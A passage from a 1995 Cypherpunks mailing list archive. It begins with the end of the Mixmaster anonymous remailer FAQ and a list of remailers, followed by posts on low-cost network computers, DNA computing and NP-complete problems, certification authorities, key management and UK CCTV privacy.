  alt.privacy
  alt.privacy.anon-server
  alt.anonymous

or you can get it by sending mail to:
  To: abacard at well.com
  Subject: Help1
  Message: [Ignored]

There is also a version on the World Wide Web.
<http://www.well.com/user/abacard/remail.html>


**What do I need to use Mixmaster remailers?**

Unlike other remailers, you can't just make your own message and send it
to the remailer. Mixmaster's security comes in part from using a special
message format. The disadvantage of this is that you need a special 
program to make the message for you. Once you have that program 
(the client) remailing is as easy as running the program, and telling it
which remailers you want to use.


**How do I get the Mixmaster client software?**

There are two sites for distribution. The first is my machine,
http://obscura.com/~loki/Welcome.html/
or ftp to obscura.com and read /pub/remail/README.no-export.
The other is by anonymous ftp to jpunix.com.

You will have to follow the instructions there to get Mixmaster.
Because Mixmaster contains cryptography, it may not be exported 
from the U.S and Canada. The reason for the circuitous route to download
Mixmaster is to show my good faith efforts to keep Mixmaster from being
exported. I have heard rumors that someone has already broken this law,
and that Mixmaster is available from Europe. I do not approve of this
and will not support that site.


**How do I get the software to run a Mixmaster remailer?**

The remailer software is available from the same sites as the client.


**But I only see one Mixmaster distribution?**

The same program is used for both the client and the remailer. The only
difference is in the installation. For the client you just compile it
and you are ready to go. For the remailer, you need to set up mail
forwarding and cron jobs.


**What kinds of computers does Mixmaster run on?**

Unfortunately, not PCs or Macs. But it is being ported to those right now.
Mixmaster runs under UNIX. The only machine it is known not to work on
is Dec Alpha. It has been tested on Linux, FreeBSD, SunOS 4.1.3,
Solaris, and several others. It has been compiled and tested on Netcom. 
If you use it on a machine or service not on this list, please let me 
know so I can add it.


**How does Mixmaster work, and why should I use it?**

You should use Mixmaster if you want the highest level of anonymity
available, or if your are tired of building remailer messages your self.
A discussion of how Mixmaster provides this level of security is beyond
the scope of this FAQ, but I put an essay on the subject on my home page.


**Does Mixmaster use PGP?**

No, Mixmaster uses the rsaref package from RSA. Mixmaster uses its own
keys and key file formats. To add a key to a key ring, simply append 
the key to your key file using your favorite text editor.


**Can Mixmaster post to News?**

Yes, like older remailers some Mixmaster remailers can post to news.
Also like older remailers, not all Mixmaster remailers can post
to news. Request the remailer's help file to check if it supports
posting. Do this by sending mail to the remailer with the subject line 
	remailer-help.
 

**When Was Mixmaster Released?**

Mixmaster was originally released on an experimental basis in late
1994. There were only ever two remailers running Mixmaster 1.0.
Mixmaster 2.0 was released on May 3, 1995. There are now 18 publicly
available Mixmaster remailers.


**What is the latest version of Mixmaster?**

Version 2.0.3 was released on Nov 27, 1995. This version uses a new
Makefile, which makes compiling it a snap. Several bugs were also fixed,
and some esoteric functions added.

Version 2.0.2 was released on Sept 22, 1995. Mixmaster remailers can
now accept messages containing multiple Mixmaster packets. Mixmaster
can be told to choose a random set of remailers to chain your message
through. It will now route multiple packet messages over independant
chains. Several minor bugs were fixed.

Version 2.0.1 was released on May 27, 1995. The only changes from 2.0
are some improvements in the documentation, and the inclusion of a 
more up to date list of remailers.


**What remailers run Mixmaster?**

The most recent list of remailers is available on my homepage,
along with the remailer list and key file for Mixmaster. You can simply
replace your old files with the ones from my site to keep up to date.
They are also available by ftp.

Here is the current list of Mixmaster remailers. Send mail to the
remailer with the subject remailer-key to retrieve the remailers
Mixmaster key.

   mix         mixmaster at obscura.com
   vishnu      mixmaster at vishnu.alias.net
   knight      mixmaster at aldebaran.armory.com
   robomix     robo at c2.org
   syrinx      syrinx at c2.org
   replay      remailer at replay.com
   hacktic     remailer at utopia.hacktic.nl
   crynwr      remailer at crynwr.com
   spook       remailer at spook.alias.net
   flame       remailer at flame.alias.net
   Armadillo   remailer at armadillo.com
   anon        mixmaster at anon.alias.net
   secrets     secret at secret.alias.net
   wmono       wmono at valhalla.phoenix.net
   ecafe-mix   mixmaster at remail.ecafe.org
   aD          anon at ad.org
   shinobi     remailer at shinobi.alias.net
   amnesia     amnesia at chardos.connix.com
   q           q at c2.org
   precipice   mixmaster at mix.precipice.com

Since this is a new FAQ, I am sure it is far from comprehensive. Watch
this space for changes to the FAQ. It will be evolving rapidly for a
while. Please send any questions you think should be here to:

Lance Cottrell <loki at obscura.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLoU3FVkk3dax7hlAQElGgP+NgE9z/sX402DN2pN9CZ5GKDLNdglEPIM
Wz52Zone7hmd1w76VFwb7RSl1uCZxVekJIb1KnPNNXmWX5fmQYMj77ucyjInmkYe
9GVnWL6SjmKmagXppyeatvOMYDt+FtolZU0hisvRS5A+LwnX95IJhiAdZkXjba//
CYC3uMqd21k=
=64iE
-----END PGP SIGNATURE-----





From ravage at einstein.ssz.com  Mon Nov 27 19:01:56 1995
From: ravage at einstein.ssz.com (Jim Choate)
Date: Tue, 28 Nov 1995 11:01:56 +0800
Subject: The future will be easy to use (fwd)
Message-ID: <199511280254.UAA00156@einstein.ssz.com>



Forwarded message:

> Subject: Re: The future will be easy to use
> From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
> Date: Mon, 27 Nov 95 21:28:05 EST
> 
> One thing that David didn't mention is security add-ons to the "network
> computers" that are supposed to be rolled out within the next few months --
> the successors to X terminals, $500 boxes with a good screen/sound,
> cheap cpu, and a few megs of ram and flash memory to hold a web browser.
> I expect some folks to make a good living by writing add-ons (including
> crypto add-ons) to these gizmos.
> 

Don't hold your breath. The current market surveys say that there is no
market for them. Check out this weeks PC Week or Mac Week, as they both
have several articles discussing this. Bottem line is that the under $1000
computer seems to have no future either in industry or the home.

Realisticaly, who in their right mind would buy a diskless workstation to
connect to Internet? You certainly wouldn't do crypto on it because it has
to boot from somewhere else and this leaves all kinds of security holes.
Also, there is the fact that at the current time there are no generaly
useable apps on Internet beyond the web and most companies would rather have
their employees doeing something more productive than hanging ten.

Anyone who bases their business on this technology won't have a business.

Take care.

                                         Jim Choate
                                         CyberTects
                                         ravage at einstein.ssz.com






From jya at pipeline.com  Mon Nov 27 20:15:35 1995
From: jya at pipeline.com (John Young)
Date: Tue, 28 Nov 1995 12:15:35 +0800
Subject: The future will be easy to use (fwd)
Message-ID: <199511280309.WAA10578@pipe3.nyc.pipeline.com>



Responding to msg by ravage at einstein.ssz.com (Jim Choate) on 
Mon, 27 Nov  8:54 PM


>Don't hold your breath. The current market surveys say 
>that there is no  market for them. Check out this weeks 
>PC Week or Mac Week, as they both  have several 
>articles discussing this. Bottem line is that the under 
>$1000  computer seems to have no future either in 
>industry or the home.


Peter Lewis reports in today's NYT on "doubts about the fantasy 
of a $500 'Network PC' " but quotes Eric Schmidt of Sun saying, 
"They will exist and they will be very successful, and not just 
from Sun and Oracle. The price points are going to be pretty 
low, and they'll look more like consumer electronics."


Anybody want this mixed review send us a BOX_top.








From pati at ipied.tu.ac.th  Mon Nov 27 20:25:50 1995
From: pati at ipied.tu.ac.th (Patiwat Panurach)
Date: Tue, 28 Nov 1995 12:25:50 +0800
Subject: Money: Back to the Future?
In-Reply-To: <199511250137.CAA12316@utopia.hacktic.nl>
Message-ID: <Pine.SUN.3.91.951128111736.25709D-100000@ipied.tu.ac.th>


On Sat, 25 Nov 1995, Anonymous wrote:

> money and credit. The Eulopean system of central banks
> has produced an advisory report outlining a possible
> regulatory response, and in this countly some Fed

Does anybody know if this advisory report can be found on the net.

-------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati at ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe
--JiuJitsu-CellularPhreaking-SukhotaiHistory-Perl-WWWDataIntegration-Puroresu--








From thad at hammerhead.com  Mon Nov 27 20:31:23 1995
From: thad at hammerhead.com (Thaddeus J. Beier)
Date: Tue, 28 Nov 1995 12:31:23 +0800
Subject: Directed Hamiltonian Path Problem
Message-ID: <199511280404.UAA03020@hammerhead.com>


>  I am curious on whether there are any applications of the directed
> Hamiltonian path problem to cryptography, zero-knowledge proofs, etcetera. My
> reaosn for asking is that I've come across something in my field (molecular
> genetics) that can be used to solve such problems in a couple of weeks or so.
>  -Allen
> 
> 
Secret sharing can be done by Hamiltonian paths.  No public key code has been
found to take advantage of those, or any other NP complete problem, so far as
I know.  DNA computing really doesn't solve the Hamiltonian graph problem, it
just makes the biggest one that you can solve a little bit bigger.  500 point
graphs remain insoluble (pun unitended) for earth-sized vats of DNA. 

Really.

-- Thaddeus Beier                   email:  thad at hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-2244





From jamesd at echeque.com  Mon Nov 27 20:44:49 1995
From: jamesd at echeque.com (James A. Donald)
Date: Tue, 28 Nov 1995 12:44:49 +0800
Subject: The future will be easy to use
Message-ID: <199511280435.UAA08732@blob.best.net>


At 11:06 AM 11/27/95 -0800, Raph Levien wrote:
> As I see it, any system that does must have the following 
> properties:
>
>   * Some variant on the Web of Trust.
>
>   * Online key-servers for getting keys in real time.
>
>   * A clean mechanism for validating keys through alternate channels.
>
>   There are three possible outcomes: we build it, the NSA builds it, or 
> Microsoft/Netscape builds it. 

Specs, anyone?

I suggest a few requirements:

Store the keys, and information about the keys in a *real* database
(for windows apps, we can redistribute the Microsoft access and or
the paradox database engines royalty free, and drive them through 
ODBC to minimize dependency on specific vendors.)

Support tree of authentification:  A key that is *named* Peter by Sam,  
or *named* Informix Corporation by the Delaware corporate registrar, shall
be considered equivalent to any other key given the same name by same
authority, whether that authority be Dark Unicorn, or the state of
Delaware.

This last property is essential if PGP keys are to be used as a
basis for exchanging promises to pay and directives to pay.

A very common use of this feature, pending the development of
user friendly software that makes every man is own bank and his
own credit rating agency, would be as follows:  Sam generates a long
key on a clean off line computer:  He uses it to name itself Sam and to
name several shorter keys "Sam".  He then puts the private long key 
on a floppy disk and buries it in a hole in the ground along with 
his gold and his stash of SKS ammo, and most likely never uses
it again.  He publishes the long public key, and uses
the shorter private keys for actual encryption.  From time to time, 
he changes keys, without any disruption or inconvenience.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From ravage at einstein.ssz.com  Mon Nov 27 20:59:42 1995
From: ravage at einstein.ssz.com (Jim Choate)
Date: Tue, 28 Nov 1995 12:59:42 +0800
Subject: Inexpensive Crypto Boxes...
Message-ID: <199511280454.WAA00361@einstein.ssz.com>



Hi all,

The recent discussion on the <$1000 computer/appliance/digital-widget got me
to thinking and I had a spasm...

The new Sony Play Station is operating under a stripped down Unix.
Considering the speed that these boxes are designed to run at it seems a
natural for somebody to come up with a crypto workbench on ROM to install in
one of these babies. Could program one of the game controller ports as a
serial port and hook it to a Linux box (for example).

Ta ta






From torrejr at pcnet.com  Mon Nov 27 21:32:06 1995
From: torrejr at pcnet.com (torrejr at pcnet.com)
Date: Tue, 28 Nov 1995 13:32:06 +0800
Subject: Cypherpunk Certification Authority
Message-ID: <Chameleon.951128011153.torrejr@>



So far, everybody on the net has discussed the fun part(s) of the CA issue. 

The techies talk about protocol, encryption ... in short the real FUN stuff. I have enjoyed diverging 
opinions of  some of the participants. Many  make excellent points and have taught me more than I 
ever dreamed to learn.

Lawyers are already making money and preparing for the future :-) Some lawyers argue about 
liabilities and drool over new laws being proposed all over the country by other lawyers to 
guarantee future lawsuits. Another lawyer does not believe CAs are an option and make a good 
buck selling books to prove it (Electronic Commerce Law-Ben Wright squire) another publishes 
the American Bar Association CA liabilities, names it draft of the digital signature
guidelines and goes to work for Verisign (CA?  DS? UH?).

I can keep talking about good stuff that has happen in the last few months for about everyone 
interested in the last frontier (the electronic one) and its trading posts (electronic commerce), but 
the fact is that there are no CAs in full production yet. Yeah! Verisign is around .... Santa Clara. Of 
course I have other choices (Did I say great choices?)  like Cost in Sweden and at one time 
EuroCert in England was advertising on the net. 

I have been asking myself ... WHY? I can't accept the standard response: Fear to liability! Granted 
that the liability factor is important but my gut feeling tells me that's not the whole story. The 
hardware and the software is out there (I haven't commented on the quality of this stuff!). I thought 
that several companies who have indicated interest have all it takes to make a successfull CA but 
nobody seem to move reasonably fast.

Is it possible that the process of issuing and maintaining a certificate is so complex and expensive? I 
think that MITRE did a study for NIST and they came-up with a cost of $800 per year per federal 
employee to maintain and administer a Federal CA.  

Any suggestion?

PS I want to thank Robert Hettinga for his excellent work promoting the principles of the 
Cypherpunks, and for diseminating critical information that helps shape the corporate world  for a 
better electronic future. 
-------------------------------------
Juan Rodriguez i Torrent
torrejr at pcnet.com
11/27/95  23:54:24
-------------------------------------







From tcmay at got.net  Mon Nov 27 22:07:06 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 28 Nov 1995 14:07:06 +0800
Subject: Directed Hamiltonian Path Problem
Message-ID: <acdfe4a7010210043794@[205.199.118.202]>


At 4:04 AM 11/28/95, Thaddeus J. Beier wrote:
>>  I am curious on whether there are any applications of the directed
>> Hamiltonian path problem to cryptography, zero-knowledge proofs, etcetera. My
>> reaosn for asking is that I've come across something in my field (molecular
>> genetics) that can be used to solve such problems in a couple of weeks or so.
>>  -Allen
>>
>>
>Secret sharing can be done by Hamiltonian paths.  No public key code has been
>found to take advantage of those, or any other NP complete problem, so far as
>I know.  DNA computing really doesn't solve the Hamiltonian graph problem, it
>just makes the biggest one that you can solve a little bit bigger.  500 point
>graphs remain insoluble (pun unitended) for earth-sized vats of DNA.
>
>Really.

Thaddeus beat me to the punch, as I was going to say just about the same thing.

The work by Adleman on "vats of computers" is intriguing, but is no real
solution to the problem of exponential or superexponential growth: a
problem that Adleman's vat could solve with a fish tank full of DNA
computers in a day could be easily outpaced by a key length "only" a bit
longer.

Check the archives for many articles on this topic. Also, check the Web
search engines for conferences, papers, etc. on this.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From stevenw at best.com  Mon Nov 27 22:31:04 1995
From: stevenw at best.com (Steven Weller)
Date: Tue, 28 Nov 1995 14:31:04 +0800
Subject: The future will be easy to use (fwd)
Message-ID: <v01530506ace05744708d@[206.86.1.35]>


>> One thing that David didn't mention is security add-ons to the "network
>> computers" that are supposed to be rolled out within the next few months --
>> the successors to X terminals, $500 boxes with a good screen/sound,
>> cheap cpu, and a few megs of ram and flash memory to hold a web browser.
>> I expect some folks to make a good living by writing add-ons (including
>> crypto add-ons) to these gizmos.
>>
>
>Don't hold your breath. The current market surveys say that there is no
>market for them. Check out this weeks PC Week or Mac Week, as they both
>have several articles discussing this. Bottem line is that the under $1000
>computer seems to have no future either in industry or the home.
>
>Realisticaly, who in their right mind would buy a diskless workstation to
>connect to Internet? You certainly wouldn't do crypto on it because it has
>to boot from somewhere else and this leaves all kinds of security holes.
>Also, there is the fact that at the current time there are no generaly
>useable apps on Internet beyond the web and most companies would rather have
>their employees doeing something more productive than hanging ten.
>
>Anyone who bases their business on this technology won't have a business.

The same sort of things could be said of the telephone compared with
written correspondence. Why would anyone have one in their business or
home? Anyone can overhear a conversation, people will just chat, the only
thing you can do with it is talk, there is no record of the correspondence,
why would anyone want to talk to people on the other side of town? etc.

Think telephone, not computer. Think people over 40 who want a
communication tool with zero maintenance and zero learning curve.


-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
+1 415 390 9732                    |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw at best.com                   |       -- Time Magazine, 3 July 1995







From attila at primenet.com  Mon Nov 27 22:36:44 1995
From: attila at primenet.com (attila)
Date: Tue, 28 Nov 1995 14:36:44 +0800
Subject: No Subject
In-Reply-To: <nanomius@netcom.com>
Message-ID: <Pine.BSD.3.91.951128061214.23333A-100000@usr5.primenet.com>



   well, if it is not the world's greatest thinker and knowledge bearer 
on Nastrodamus posting an announcement on a message we've already seen 
at least twice, and hashed.

   read the threads before you post!







From jordan at Thinkbank.COM  Mon Nov 27 22:36:51 1995
From: jordan at Thinkbank.COM (Jordan Hayes)
Date: Tue, 28 Nov 1995 14:36:51 +0800
Subject: Internet Terminals
Message-ID: <199511280620.WAA25319@Thinkbank.COM>


	From mclow at owl.csusm.edu Mon Nov 27 20:07:37 1995

	Would you write and send e-mail if you had no way of
	archiving it?

This is what AOL is.

	Would you use "net-quicken", if it required all your data
	to be stored on a shared disk at Intuit?

Who are you kidding?  All your banking information is stored *at
your bank* today; how is that any different?

OBCrypto: none.

/jordan





From mp at moonmac.com  Mon Nov 27 22:53:20 1995
From: mp at moonmac.com (Michael Pearce)
Date: Tue, 28 Nov 1995 14:53:20 +0800
Subject: ETH_ic?
Message-ID: <v02120d04ace02917b7e4@[204.119.62.251]>


Nb5s $bp2s writes,

>>      ...the case has killed the hacker ethic. "If I saw someone
>>      on the Internet with a security weakness, at this point
>>      I would be reluctant to act the Good Samaritan and
>>      report it," said Jeffrey Kegler, an independent software
>>      consultant in Sunnyvale Calif. "If I saw weakness in
>>      Intel's machine, I'd keep it to myself."

If I saw a weakness in Intel's machine I would happily inform the company
in the safest way possible: posting it to Cypherpunks,
alt.destroy.microsoft, comp.sys.intel and any other appropriate newsgroup,
via anonymous server. I'm sure the information would wind up in the correct
hands _eventually_.

Not that I'm suggesting anything, of course.

|^^^^^^Please don't add "*@aol.com" to your twit filter. Thank you.^^^^^^|
|          mklprc at aol.com          |   "Give them a light and they'll    |
|          mp at moonmac.com         <*>       follow it anywhere!"         |
| http://www.teleport.com/~mklprc/ |               -- Firesign Theater   |
|   No Microsoft products were used in the production of this message.   |
\----smuggle FSF terrorist BATF (fnord) FBI nuclear Saddam PGP Clinton---/







From jamesd at echeque.com  Mon Nov 27 23:07:11 1995
From: jamesd at echeque.com (James A. Donald)
Date: Tue, 28 Nov 1995 15:07:11 +0800
Subject: The future will be easy to use
Message-ID: <199511280658.WAA23722@blob.best.net>


At 01:12 PM 11/27/95 -0800, Jonathan Zamick wrote:
> it
> means forming a group, made up of Cypherpunk members perhaps, but much
> smaller, and capable of working together. Also capable of handling not only
> the theory, but good solid code, GUI, PR, meetings, talking to the
> government, etc.

Skip the talking to the government bit:  Ignore, do not confront.

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From jamesd at echeque.com  Mon Nov 27 23:39:47 1995
From: jamesd at echeque.com (James A. Donald)
Date: Tue, 28 Nov 1995 15:39:47 +0800
Subject: The future will be easy to use
Message-ID: <199511280731.XAA11527@blob.best.net>


At 08:38 PM 11/27/95 -0500, James Black wrote:

>  As soon as PGP 3.0 is released I am planning on incorporating PGP into 
>Pine, and start putting it into more programs, to increase the usage of 
>encryption things before they go out.

Is there any public spec for PGP 3.0?

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd at echeque.com






From ses at tipper.oit.unc.edu  Mon Nov 27 23:48:27 1995
From: ses at tipper.oit.unc.edu (Simon Spero)
Date: Tue, 28 Nov 1995 15:48:27 +0800
Subject: Inexpensive Crypto Boxes...
In-Reply-To: <199511280454.WAA00361@einstein.ssz.com>
Message-ID: <Pine.SOL.3.91.951127231345.28726A-100000@chivalry>


On Mon, 27 Nov 1995, Jim Choate wrote:
> 
> The new Sony Play Station is operating under a stripped down Unix.
> Considering the speed that these boxes are designed to run at it seems a
> natural for somebody to come up with a crypto workbench on ROM to install in
> one of these babies. Could program one of the game controller ports as a
> serial port and hook it to a Linux box (for example).

We've had this discussion sort of before, but not involving consoles yet, 
so I'll throw in my 2p. 

It isn't likely to be worth doing this with a sony play-station; it's DSP
capabilities are nothing special, and you're paying way too much for
irrelevant stuff like CD-ROMs, 3D accellerators, etc. For the same money
you could get a load of 56Ks or some of the TI chips. If you must
canabalise a game system, you'ld be better off using either a Sega Saturn
(more general purpose CPU power), or mayhaps ripping apart an Atari
Jaguar, which has some nice custom DSP hardware, with a big fat bus to 
play with. It'd still be more of a stupid pet trick than a real solution, 
but definitely a neat hack.

Non-crypto.

BTW, I wouldn't be suprised if we do get to see some sort of Internet 
software for the next generation consoles. I remember getting a pretty 
good spit-take out of some of the NCSA guys at the WWW-WW in 93 when I 
mentioned AT&T were bringing out a modem for the sega genesis, and we 
were thinking about getting a dev kit and taking a shot at 'Sonic the 
Webhog' (turned out to be impractical - bit rate was too low, dev kits 
too expensive). With the new systems, the dynamics have changed (nvram in 
the machines, faster comms, more memory and CPU).

I still think that the idea of selling dickless workstations for the home 
is prehaps not the best response to rapidly falling disk prices; however, 
If you raise the price by $100, and use that money to add a 500Mb/1Gb 
hard drive, the whole thing becomes a lot more interesting - thats enough 
storage to keep your localy created data around (unlikely to exceed 
100Mb), whilst using the rest as a cache for stuff that really lives on 
the network. If I had any shirts worth betting I wouldn't put them on 
this concept, but it might be interesting.

Simon





From jcobb at ahcbsd1.ovnet.com  Tue Nov 28 00:32:30 1995
From: jcobb at ahcbsd1.ovnet.com (James M. Cobb)
Date: Tue, 28 Nov 1995 16:32:30 +0800
Subject: No Privacy Right in UK ? - Part 2
Message-ID: <Pine.BSD.3.91.951128000018.20981B-100000@ahcbsd1.ovnet.com>


 
 
Friend, 
 
 
11 27 95 Press Association News in the UK reports: 
 
   STORM AS SPY CAMERA `JUICY BITS' SET FOR SALE 
 
 
"Furious MPs are demanding action," cries the story.  Why? 
 
   Their anger follows a row over the sale in video shops of 
   "juicy bits" from closed circuit TV cameras fixed in high 
   streets and stores to detect crime. 
 
 
High streets: where the fashionable retail shops are. 
 
   One extract showed a couple having sex in a doorway, 
   unaware they were being watched. 
 
 
It wasn't me, Mums, I swear! 
 
A Liberal Democrat family spokeswoman: 
 
   "That this sale has been allowed is a disgrace and will 
   undermine the trust the public has in cameras designed 
   to cut crime." 
 
 
A Labour MP: 
 
   "This situation plainly leaves people wide open to black- 
   mail." 
 
 
He said "some of his constituents in Linlithgow had recently
been compromised by such a video." 
 
A sly dog at the Home Office: 
 
   "We have not seen the video [good move!], but judging from 
   what has been said about it, it would have to be classified 
   by the British Board of Film Classification if it is being sold." 
 
 
If we don't have privacy, we do have censorship! 
 
But Mums, I swear... 
 
 
Cordially, 
 
Jim 
 
 
 
NOTE.  The Press Association website's URL: 
 
             http://www.pa.press.net 
 
       The newsstory's online filename: pick8.html. 
 
 






From mclow at owl.csusm.edu  Tue Nov 28 00:33:19 1995
From: mclow at owl.csusm.edu (Marshall Clow)
Date: Tue, 28 Nov 1995 16:33:19 +0800
Subject: Internet Terminals
Message-ID: <v03003d01ace034532775@[204.250.84.3]>


Jim Choate sez:
>Forwarded message:
>
>> Subject: Re: The future will be easy to use
>> From: dlv at bwalk.dm.com (Dr. Dimitri Vulis)
>> Date: Mon, 27 Nov 95 21:28:05 EST
>>
>> One thing that David didn't mention is security add-ons to the "network
>> computers" that are supposed to be rolled out within the next few months --
>> the successors to X terminals, $500 boxes with a good screen/sound,
>> cheap cpu, and a few megs of ram and flash memory to hold a web browser.
>> I expect some folks to make a good living by writing add-ons (including
>> crypto add-ons) to these gizmos.
>>
>
>Don't hold your breath. The current market surveys say that there is no
>market for them. Check out this weeks PC Week or Mac Week, as they both
>have several articles discussing this. Bottem line is that the under $1000
>computer seems to have no future either in industry or the home.
>
I agree and disagree. ;-)

The "internet terminal", or "internet appliance", as it is sometimes called,
is IMHO, worthless. Would you write and send e-mail if you had no way of
archiving it? Would you use "net-quicken", if it required all your data to
be stored on a shared disk at Intuit? (There was an interview on NPR 11/17
where this was touted as "the next big thing"!)

On the other hand, I believe that a <$1000 computer would be a big seller.
>From a marketing point of view, there's just something about a price tag
with three digits left of the decimal point, even if they're all nines :-)
The tough part is making it usable, and making some money on it.
[ I've got this 386-40, with 1 MB RAM and a 40MB hd, see... ]


>Realisticaly, who in their right mind would buy a diskless workstation to
>connect to Internet?
>
No one.

>You certainly wouldn't do crypto on it because it has
>to boot from somewhere else and this leaves all kinds of security holes.
>
Actually, I think the plan is to boot from ROM.

>Anyone who bases their business on this technology won't have a business.
>
I agree.


-- Marshall

Marshall Clow	              Aladdin Systems
mclow at mailhost2.csusm.edu

"Eternal vigilance is the price of PostScript"
-- MacUser Jan 96 DTP and Graphics column







From tcmay at got.net  Tue Nov 28 00:38:51 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 28 Nov 1995 16:38:51 +0800
Subject: Diskless "Eunuchs" Machines Likely to Fail
Message-ID: <ace0059603021004f459@[205.199.118.202]>


At 6:17 AM 11/28/95, Steven Weller wrote:

>The same sort of things could be said of the telephone compared with
>written correspondence. Why would anyone have one in their business or
>home? Anyone can overhear a conversation, people will just chat, the only
>thing you can do with it is talk, there is no record of the correspondence,
>why would anyone want to talk to people on the other side of town? etc.
>
>Think telephone, not computer. Think people over 40 who want a
>communication tool with zero maintenance and zero learning curve.

I'm skeptical of the "Diskless Internet Box = Telephone" analogy.

Folks I know who are not computer-savvy, or who have other things they'd
rather be doing, are not likely, as I see it, to buy boxes that still
require them to type messages to other people but that don't allow them to
download and save the interesting stuff they find.

The telephone appealed to those who truly wanted to "just keep
talking"...that was the beauty of it. Most people don't know how to
touch-type, and typing by hunting-and-pecking is painful and unnatural for
most people.

A couple of years ago "the computer for the rest of us" was said to be a
pen-based Newton-type machine, now it is said to be a diskless,
memory-limited "Eunuchs" machine.

(The diskless--and disketteless--systems I've seen described recently would
make it impossible for me to interact as I currently do. To be sure, maybe
"data storage services" will spring up to temporarily store stuff one has
snarfed, but the download to one's home terminal still must be done again.
Faster modems, and cable modems, will change things somewhat, but then this
is a huge change in a lot of ways, in any case. Even the stereotypcial
"chatters" at AOL are heavy users of local storage: witness the massive
number of "me too!" posts from AOLers whenever a nude GIF or JPEG of Sandra
Bullock or Jennifer Anniston is mentioned...they clearly are downloading a
lot of images and whatnot to home machines...that measly 4 MB of flash
memory is going to get filled up mighty fast.)

By the way, Intel builds a lot of the motherboards for use by various
companies. Someone at Intel claimed recently that even if the CPU was
completely free (as some 486s effectively are already), Intel could not see
how a system could be consistently built for under $500, including monitor,
small disk, memory, etc.

(The Oracle folks are muttering about a Newton-like OS which would load
objects or applets or whatever in a more efficient way...this might work,
but I'm still skeptical that user's needs can be met. Those folks wanting
local access to the JPEGs of Sandra Bullock will still be out of luck....)

I see a greater chance that home game machines, such as the 3DO and Sony
PlayStation machines will get Web browsers done for them than I do that
people will buy machines that are so limited.

The only relevance of this whole topic to Cypherpunks is....is....minimal.

--Tim May, who plans to find a way to use this boondoggle idea by Oracle to
make money. (Right now I'm long Oracle, but this may soon change.)

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From perry at piermont.com  Tue Nov 28 03:39:39 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Tue, 28 Nov 1995 19:39:39 +0800
Subject: Directed Hamiltonian Path Problem
In-Reply-To: <acdfe4a7010210043794@[205.199.118.202]>
Message-ID: <199511280616.BAA11852@jekyll.piermont.com>



Timothy C. May writes:
> The work by Adleman on "vats of computers" is intriguing, but is no real
> solution to the problem of exponential or superexponential growth: a
> problem that Adleman's vat could solve with a fish tank full of DNA
> computers in a day could be easily outpaced by a key length "only" a bit
> longer.

Indeed. Its the problem with innumeracy. People don't understand that
if, say, a problem is O(2^N), and a problem of size 1000 requires a
liter of fluid, a problem of size 2000 requires 
107150860718626732094842504906000181056140481170553360744375038837035\
105112493612249319837881569585812759467291755314682518714528569231404\
359845775746985748039345677748242309854210746050623711418779541821530\
464749835819412673987675591655439460770629145711964776865421676604298\
31652624386837205668069376 liters of fluid.

I'll note that is something like
107150860718626732094842504906000181056140481170553360744375038837035\
105112493612249319837881569585812759467291755314682518714528569231404\
3598457757469857480393456777482423098542107460506237114187795418
times more liters of fluid than there are fundamental particles in the
universe -- being too lazy to calculate the number of fundamental
particles in a liter, I won't make the more relevant statement of what
multiple of the number of particles in the universe the number of
particles in that number of liters of fluid would be.

The stuff on quantum factoring worries me more than Adleman fluid -- I
never can get an explanation of it clear enough to decide if it is
more than a theoretical concern.

Perry





From anonymous-remailer at shell.portal.com  Tue Nov 28 03:54:06 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Tue, 28 Nov 1995 19:54:06 +0800
Subject: Cypherpunk Certification Authority
Message-ID: <199511281032.CAA21495@jobe.shell.portal.com>


On Sun, 26 Nov 1995, Perry E. Metzger wrote:


> Someone spoofing Alice, who is either Detweiler or "Dr." Cohen, says:
> > I have never signed any of my posts to this mailing list and frankly have
> > no intention of beginning at this point.
> 
> Well, signed Alice posts have shown up, so we will just have to assume
> that the above was a spoof and that the signed Alice posts are the
> real ones, now won't we?

Perry.  Normally I try my best to ignore you.

But I will simply repeat, I have never signed a post, and have no 
intention of beginning to sign any posts, until I establish a secure 
machine in a secure complex that is dedicated to that purpose.

I like to think that I take my security somewhat seriously.

And I would ask whoever DID post the PGP key under my name, to please
issue a revocation certificate. 

> Perry

Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From weidai at eskimo.com  Tue Nov 28 04:02:03 1995
From: weidai at eskimo.com (Wei Dai)
Date: Tue, 28 Nov 1995 20:02:03 +0800
